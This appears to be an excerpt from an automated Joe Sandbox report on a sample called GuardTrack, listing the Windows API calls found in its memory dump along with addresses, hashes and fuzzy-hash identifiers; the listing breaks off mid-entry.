                                                          • Instruction ID: f4731c52f511d9ecff7e0dbed149449afb2b6cf74aa55df2f29a246fd63d9850
                                                          • Opcode Fuzzy Hash: 0a4cf1c6a572b45d609a70cd6715bdd80ce682b6a06815894737e21dc73d0c76
                                                          • Instruction Fuzzy Hash: E121A6749082219F8700DF68C8859EABBF9FE56364F14461DF496C73A2D730DA87CB42
                                                          APIs
                                                          • GetWindowLongW.USER32(?,000000EC), ref: 006363BD
                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 006363D7
                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 006363E5
                                                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 006363F3
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Window$Long$AttributesLayered
                                                          • String ID:
                                                          • API String ID: 2169480361-0
                                                          • Opcode ID: e49009dac1f10ecd11d8a1b85c513f90d700181c4f56877242f3c9e5b46bc516
                                                          • Instruction ID: f16d14351cc8577505438ff36bf86a2856bd133cb8c237e1e7063f0fe1814944
                                                          • Opcode Fuzzy Hash: e49009dac1f10ecd11d8a1b85c513f90d700181c4f56877242f3c9e5b46bc516
                                                          • Instruction Fuzzy Hash: 5611B135305524AFE704AB24DC59FBA7B9AEF86320F149118FA16CB2D2CB74BD018BD5
                                                          APIs
                                                            • Part of subcall function 0060F858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0060E46F,?,?,?,0060F262,00000000,000000EF,00000119,?,?), ref: 0060F867
                                                            • Part of subcall function 0060F858: lstrcpyW.KERNEL32(00000000,?), ref: 0060F88D
                                                            • Part of subcall function 0060F858: lstrcmpiW.KERNEL32(00000000,?,0060E46F,?,?,?,0060F262,00000000,000000EF,00000119,?,?), ref: 0060F8BE
                                                          • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0060F262,00000000,000000EF,00000119,?,?,00000000), ref: 0060E488
                                                          • lstrcpyW.KERNEL32(00000000,?), ref: 0060E4AE
                                                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,0060F262,00000000,000000EF,00000119,?,?,00000000), ref: 0060E4E2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: lstrcmpilstrcpylstrlen
                                                          • String ID: cdecl
                                                          • API String ID: 4031866154-3896280584
                                                          • Opcode ID: da0ed74037ef70a343f7b7c47a2c84a890bca203f04f7aeeb23f66291201d5e2
                                                          • Instruction ID: 4922fe74426fc07e47d9091236263aaf23aeed31e18264c7f1530526a8796f4b
                                                          • Opcode Fuzzy Hash: da0ed74037ef70a343f7b7c47a2c84a890bca203f04f7aeeb23f66291201d5e2
                                                          • Instruction Fuzzy Hash: 8711D63A100355AFDB299F64DC45DBB77BAFF45350B40542BF906C72A0EB729940C791
                                                          APIs
                                                          • _free.LIBCMT ref: 005E5331
                                                            • Part of subcall function 005D593C: __FF_MSGBANNER.LIBCMT ref: 005D5953
                                                            • Part of subcall function 005D593C: __NMSG_WRITE.LIBCMT ref: 005D595A
                                                            • Part of subcall function 005D593C: RtlAllocateHeap.NTDLL(00FE0000,00000000,00000001,?,?,?,?,005D1003,?,0000FFFF), ref: 005D597F
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeap_free
                                                          • String ID:
                                                          • API String ID: 614378929-0
                                                          • Opcode ID: 5a3f71c8fce0409d2db89f727a6dc2d8ba9ea0c0e99a9b2dca742450c49fc712
                                                          • Instruction ID: 2c099763ea2ac922fa072ffdfd463db6474daea8d967cfdd2e9aa5e4b61562e0
                                                          • Opcode Fuzzy Hash: 5a3f71c8fce0409d2db89f727a6dc2d8ba9ea0c0e99a9b2dca742450c49fc712
                                                          • Instruction Fuzzy Hash: 72113D31405A57AFCB393F79AC0965E3F957F593A4F200D57F598962D0EEB089408750
                                                          APIs
                                                          • _memset.LIBCMT ref: 005C5B58
                                                            • Part of subcall function 005C56F8: _memset.LIBCMT ref: 005C5787
                                                            • Part of subcall function 005C56F8: _wcscpy.LIBCMT ref: 005C57DB
                                                            • Part of subcall function 005C56F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 005C57EB
                                                          • KillTimer.USER32(?,00000001,?,?), ref: 005C5BAD
                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 005C5BBC
                                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00600D7C
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                          • String ID:
                                                          • API String ID: 1378193009-0
                                                          • Opcode ID: cbd9e4d193d55f3059fdccaf01d8fcf10947603f1637113f53095ad0f38f437f
                                                          • Instruction ID: 4f67219877038e7fd94fb4c7e77fd11c11a5d51972ce314b6b2f1955fb6494c1
                                                          • Opcode Fuzzy Hash: cbd9e4d193d55f3059fdccaf01d8fcf10947603f1637113f53095ad0f38f437f
                                                          • Instruction Fuzzy Hash: 7121C1745447849FF7728BA48899FEBBFEDAF01308F00048DE69A56281D7743AC5CB51
                                                          APIs
                                                          • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00614385
                                                          • _memset.LIBCMT ref: 006143A6
                                                          • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 006143F8
                                                          • CloseHandle.KERNEL32(00000000), ref: 00614401
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: CloseControlCreateDeviceFileHandle_memset
                                                          • String ID:
                                                          • API String ID: 1157408455-0
                                                          • Opcode ID: 9dd4cafe3383635bfbd32f0665d19e954a9a14d476f1c7118daebbf9ea49e8f8
                                                          • Instruction ID: 34fbf430f21a5cf0f5ef13b135e45ed1503bc07ba9f659e18de3de0f0713d9f4
                                                          • Opcode Fuzzy Hash: 9dd4cafe3383635bfbd32f0665d19e954a9a14d476f1c7118daebbf9ea49e8f8
                                                          • Instruction Fuzzy Hash: A6110A759012287AE7309BA5AC4DFEBBB7CEF45720F04459AF908E7280D6704E808BA4
                                                          APIs
                                                            • Part of subcall function 005C402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00617E51,?,?,00000000), ref: 005C4041
                                                            • Part of subcall function 005C402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00617E51,?,?,00000000,?,?), ref: 005C4065
                                                          • gethostbyname.WSOCK32(?,?,?), ref: 00626A84
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00626A8F
                                                          • _memmove.LIBCMT ref: 00626ABC
                                                          • inet_ntoa.WSOCK32(?), ref: 00626AC7
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                          • String ID:
                                                          • API String ID: 1504782959-0
                                                          • Opcode ID: bf67e73c8800c5e797a09e5fdbd4607b52c0137cd45c52b6160d8eda797e670a
                                                          • Instruction ID: fb1c87530b40d96f601d28856b2fa65de087b45899bbee3c6317d19e30747c13
                                                          • Opcode Fuzzy Hash: bf67e73c8800c5e797a09e5fdbd4607b52c0137cd45c52b6160d8eda797e670a
                                                          • Instruction Fuzzy Hash: 8C118475500019AFCB00EBE4DD4ADEE7BB9BF45300B044069F501A72A2DF30AE00CF91
                                                          APIs
                                                            • Part of subcall function 005B29E2: GetWindowLongW.USER32(?,000000EB), ref: 005B29F3
                                                          • DefDlgProcW.USER32(?,00000020,?), ref: 005B16B4
                                                          • GetClientRect.USER32(?,?), ref: 005EB93C
                                                          • GetCursorPos.USER32(?), ref: 005EB946
                                                          • ScreenToClient.USER32(?,?), ref: 005EB951
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Client$CursorLongProcRectScreenWindow
                                                          • String ID:
                                                          • API String ID: 4127811313-0
                                                          • Opcode ID: dd42e5a7b7c89a0d6ca0503ae111e0261fd52cacac1f00107250d24a53ec57e7
                                                          • Instruction ID: 07a7fe687c441f5e95b5ffac201b57d1eff5ad9795235c8f427b693d42bd7468
                                                          • Opcode Fuzzy Hash: dd42e5a7b7c89a0d6ca0503ae111e0261fd52cacac1f00107250d24a53ec57e7
                                                          • Instruction Fuzzy Hash: 6A115839A0041AABDB04EF98C899DFE7BB9FB49301F500455FA52E7550D330BA51CBA9
                                                          APIs
                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00609719
                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0060972B
                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00609741
                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0060975C
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: fc07cc0c1db45d4de2a53aec68db4d17fa69454eebae1c41fd088338c6d197c8
                                                          • Instruction ID: a8c6ca39ceb77fe9e4a7436bfe5e421598a522fa1a726c8b05bd4c38f20869aa
                                                          • Opcode Fuzzy Hash: fc07cc0c1db45d4de2a53aec68db4d17fa69454eebae1c41fd088338c6d197c8
                                                          • Instruction Fuzzy Hash: 4811483A941218FFEB10DF95C984EDEBBB9FB48710F204095EA04B7290D671AE11DBA4
                                                          APIs
                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 005B214F
                                                          • GetStockObject.GDI32(00000011), ref: 005B2163
                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 005B216D
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: CreateMessageObjectSendStockWindow
                                                          • String ID:
                                                          • API String ID: 3970641297-0
                                                          • Opcode ID: 7928eeb7f8986a563b45ef7a7ff9eb3ce99b87eed0496310c35a2964c299a3bc
                                                          • Instruction ID: a40b69442b247ca3206fe3aead20657ff4079c97503393835bd8bcf8942c7d1e
                                                          • Opcode Fuzzy Hash: 7928eeb7f8986a563b45ef7a7ff9eb3ce99b87eed0496310c35a2964c299a3bc
                                                          • Instruction Fuzzy Hash: DE115BB2501559BFEB164F949C44EEB7F6AFF59394F050115FB0456120C731AC60DBA1
                                                          APIs
                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,006104EC,?,0061153F,?,00008000), ref: 0061195E
                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,006104EC,?,0061153F,?,00008000), ref: 00611983
                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,006104EC,?,0061153F,?,00008000), ref: 0061198D
                                                          • Sleep.KERNEL32(?,?,?,?,?,?,?,006104EC,?,0061153F,?,00008000), ref: 006119C0
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: CounterPerformanceQuerySleep
                                                          • String ID:
                                                          • API String ID: 2875609808-0
                                                          • Opcode ID: f0a5621f893841a799518ae9979f77721db471bfba793ce626dd821b26d7e45d
                                                          • Instruction ID: b85c1bf120d0a3cc5c102a9e6d77151f449757e5022c23e176a977392203fb06
                                                          • Opcode Fuzzy Hash: f0a5621f893841a799518ae9979f77721db471bfba793ce626dd821b26d7e45d
                                                          • Instruction Fuzzy Hash: 03115A31C0052DDBDF00AFE4D958BEEBB7AFF0A711F044446EA90BB240CB3096908B95
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0063E1EA
                                                          • LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 0063E201
                                                          • RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 0063E216
                                                          • RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 0063E234
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Type$Register$FileLoadModuleNameUser
                                                          • String ID:
                                                          • API String ID: 1352324309-0
                                                          • Opcode ID: 808c347fada3148f41facefbe2e80450411dc45d5ee0c6ac70f5862b15943c36
                                                          • Instruction ID: 5e01cd53ba605dab534fd21f5407d43190c99b74d28c66b20f5c88b9f68aea60
                                                          • Opcode Fuzzy Hash: 808c347fada3148f41facefbe2e80450411dc45d5ee0c6ac70f5862b15943c36
                                                          • Instruction Fuzzy Hash: E11161B9205314DBE3308F51DD08F93BBBDEB00B00F108559E716D6190D7B1E6049BE1
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                          • String ID:
                                                          • API String ID: 3016257755-0
                                                          • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                          • Instruction ID: dded5de6ea2e167ed68fce86fa6b8cc14603c7c7f53532794abd5e8d318d4b56
                                                          • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                          • Instruction Fuzzy Hash: F8018C3604818EBBCF1A5E86CC058EE3F23FB5D340B088515FA9858131C336C9B1AB81
                                                          APIs
                                                          • GetWindowRect.USER32(?,?), ref: 0063B956
                                                          • ScreenToClient.USER32(?,?), ref: 0063B96E
                                                          • ScreenToClient.USER32(?,?), ref: 0063B992
                                                          • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0063B9AD
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: ClientRectScreen$InvalidateWindow
                                                          • String ID:
                                                          • API String ID: 357397906-0
                                                          • Opcode ID: 8e7fd1b3dae2babc8cb9fd8b54a5bf1f937b4bdfd715483fd5a39f4573dd5672
                                                          • Instruction ID: f7285d1d3f99f1cf9ef5acd252dab506b7830a3558ff3fac215cb6c128a394e2
                                                          • Opcode Fuzzy Hash: 8e7fd1b3dae2babc8cb9fd8b54a5bf1f937b4bdfd715483fd5a39f4573dd5672
                                                          • Instruction Fuzzy Hash: 761174B9D00209EFDB41DF98C884AEEBBF9FF49310F105156E915E3210D731AA618F90
                                                          APIs
                                                          • _memset.LIBCMT ref: 0063BCB6
                                                          • _memset.LIBCMT ref: 0063BCC5
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00678F20,00678F64), ref: 0063BCF4
                                                          • CloseHandle.KERNEL32 ref: 0063BD06
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: _memset$CloseCreateHandleProcess
                                                          • String ID:
                                                          • API String ID: 3277943733-0
                                                          • Opcode ID: bb52748d5d2ee953de112279c58d710b11e1089db0fcc6a3718e11ec7fe18afd
                                                          • Instruction ID: 9a7b84e083698e56ee0aa9f9e69434b05841ab3ad4640c2a1feb3baff9499860
                                                          • Opcode Fuzzy Hash: bb52748d5d2ee953de112279c58d710b11e1089db0fcc6a3718e11ec7fe18afd
                                                          • Instruction Fuzzy Hash: 28F03AB26803157EE3506B65AC0DFBB3E5FEB49790F005422FA0CD61A2EB794C5087A9
                                                          APIs
                                                          • EnterCriticalSection.KERNEL32(?), ref: 006171A1
                                                            • Part of subcall function 00617C7F: _memset.LIBCMT ref: 00617CB4
                                                          • _memmove.LIBCMT ref: 006171C4
                                                          • _memset.LIBCMT ref: 006171D1
                                                          • LeaveCriticalSection.KERNEL32(?), ref: 006171E1
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection_memset$EnterLeave_memmove
                                                          • String ID:
                                                          • API String ID: 48991266-0
                                                          • Opcode ID: db647153a8b290d164d2aa6750f2be043359e83e5bc9265d2d9a41df9b8ea4d4
                                                          • Instruction ID: 530d7747a1bca22c58d4ea6a27e50c93ae0b955f7b0a840015a0b361e745479f
                                                          • Opcode Fuzzy Hash: db647153a8b290d164d2aa6750f2be043359e83e5bc9265d2d9a41df9b8ea4d4
                                                          • Instruction Fuzzy Hash: 23F0303A100110ABCB516F55DC89A8ABB2AEF45360F08C056FE085E21AC731A951DBB4
                                                          APIs
                                                            • Part of subcall function 005B16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 005B1729
                                                            • Part of subcall function 005B16CF: SelectObject.GDI32(?,00000000), ref: 005B1738
                                                            • Part of subcall function 005B16CF: BeginPath.GDI32(?), ref: 005B174F
                                                            • Part of subcall function 005B16CF: SelectObject.GDI32(?,00000000), ref: 005B1778
                                                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0063C3E8
                                                          • LineTo.GDI32(00000000,?,?), ref: 0063C3F5
                                                          • EndPath.GDI32(00000000), ref: 0063C405
                                                          • StrokePath.GDI32(00000000), ref: 0063C413
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                          • String ID:
                                                          • API String ID: 1539411459-0
                                                          • Opcode ID: 9cfe3516401655a2714bdad5a594d01bf9b0d79d37eff499c913422f8c111d00
                                                          • Instruction ID: 3ec801776ab8ef44b11eb44fc4a9240e0d1277838c5540ffe471ac84e5ab8f20
